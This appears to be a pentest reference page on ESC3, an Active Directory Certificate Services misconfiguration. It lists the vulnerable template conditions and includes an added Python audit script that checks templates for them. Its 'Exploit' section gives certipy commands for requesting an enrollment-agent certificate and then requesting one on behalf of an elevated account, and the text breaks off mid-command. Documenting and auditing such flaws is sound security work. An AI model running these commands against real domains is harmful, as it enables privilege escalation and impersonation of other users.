ESC3

TL;DR

ESC3 allows you to request a certificate that can then be used to request another certificate on behalf of any user, and to use that second certificate to authenticate as that user via Kerberos.

A template is vulnerable to ESC3 when it defines the Certificate Request Agent EKU, which allows the certificate holder to enroll in other certificate templates on behalf of other principals.

A certificate template with the following configuration is vulnerable to ESC3:

  • The Enterprise CA allows low-privileged users enrollment rights.

  • Manager approval is disabled.

  • No authorized signatures are required.

  • An overly permissive certificate template security descriptor grants certificate enrollment rights to low-privileged users.

  • The certificate template defines the Certificate Request Agent EKU.
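As an added example (not part of the original page), a defender-side audit that checks a template's LDAP attributes against the template-side conditions in the list above; the CA-level enrollment check is out of scope here. The template dict, its simplified ACE list and the SIDs are constructed, and the set of "low-privileged" principals is an assumption to adjust per environment.

```python
# Audit one certificate template for the template-side ESC3 preconditions.
# Attribute names match the template objects in the PKI configuration container;
# the ACE list is a simplified (sid, right) view of nTSecurityDescriptor.

CERT_REQUEST_AGENT_EKU = "1.3.6.1.4.1.311.20.2.1"          # Certificate Request Agent
CT_FLAG_PEND_ALL_REQUESTS = 0x00000002                       # manager approval bit
ENROLL_RIGHT_GUID = "0e10c968-78fb-11d2-90d4-00c04f79dc55"   # Certificate-Enrollment right
# Assumption: which principals count as low-privileged; extend for your domain.
LOW_PRIV_SIDS = {"S-1-1-0", "S-1-5-11"}                      # Everyone, Authenticated Users
LOW_PRIV_DOMAIN_RIDS = {513, 515}                            # Domain Users, Domain Computers

def is_low_privileged(sid: str) -> bool:
    """True for broad well-known groups or domain groups with a low-privileged RID."""
    if sid in LOW_PRIV_SIDS:
        return True
    if sid.startswith("S-1-5-21-"):
        return int(sid.rsplit("-", 1)[1]) in LOW_PRIV_DOMAIN_RIDS
    return False

def esc3_findings(template: dict) -> list:
    """Return the ESC3 preconditions this template meets (one string per condition)."""
    findings = []
    if CERT_REQUEST_AGENT_EKU in template.get("pKIExtendedKeyUsage", []):
        findings.append("Certificate Request Agent EKU present")
    if not template.get("msPKI-Enrollment-Flag", 0) & CT_FLAG_PEND_ALL_REQUESTS:
        findings.append("manager approval disabled")
    if template.get("msPKI-RA-Signature", 0) == 0:
        findings.append("no authorized signatures required")
    enrollers = sorted(ace["sid"] for ace in template.get("aces", [])
                       if ace["right"] == ENROLL_RIGHT_GUID and is_low_privileged(ace["sid"]))
    if enrollers:
        findings.append("low-privileged enrollment rights: " + ", ".join(enrollers))
    return findings

def is_esc3_vulnerable(template: dict) -> bool:
    """All four template-side conditions must hold for the template to be ESC3-vulnerable."""
    return len(esc3_findings(template)) == 4

# Constructed samples: an enrollment-agent template open to Domain Users, and the
# same template hardened with manager approval and Domain Admins-only enrollment.
VULNERABLE = {"name": "EnrollmentAgent",
              "pKIExtendedKeyUsage": [CERT_REQUEST_AGENT_EKU],
              "msPKI-Enrollment-Flag": 0, "msPKI-RA-Signature": 0,
              "aces": [{"sid": "S-1-5-21-1000-2000-3000-513", "right": ENROLL_RIGHT_GUID}]}
HARDENED = dict(VULNERABLE, **{"msPKI-Enrollment-Flag": CT_FLAG_PEND_ALL_REQUESTS,
                "aces": [{"sid": "S-1-5-21-1000-2000-3000-512", "right": ENROLL_RIGHT_GUID}]})

if __name__ == "__main__":
    for t in (VULNERABLE, HARDENED):
        print(t["name"], "ESC3" if is_esc3_vulnerable(t) else "ok", esc3_findings(t))
```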

Exploit

Linux (Attacker)
# Request a certificate using a domain account
certipy req -username [username]@[domain] -password [password] -ca [CA CN] -target [CA FQDN] -template [vuln template]

# Request a certificate using the .pfx output from above command with -on-behalf-of an elevated account
certipy req -u
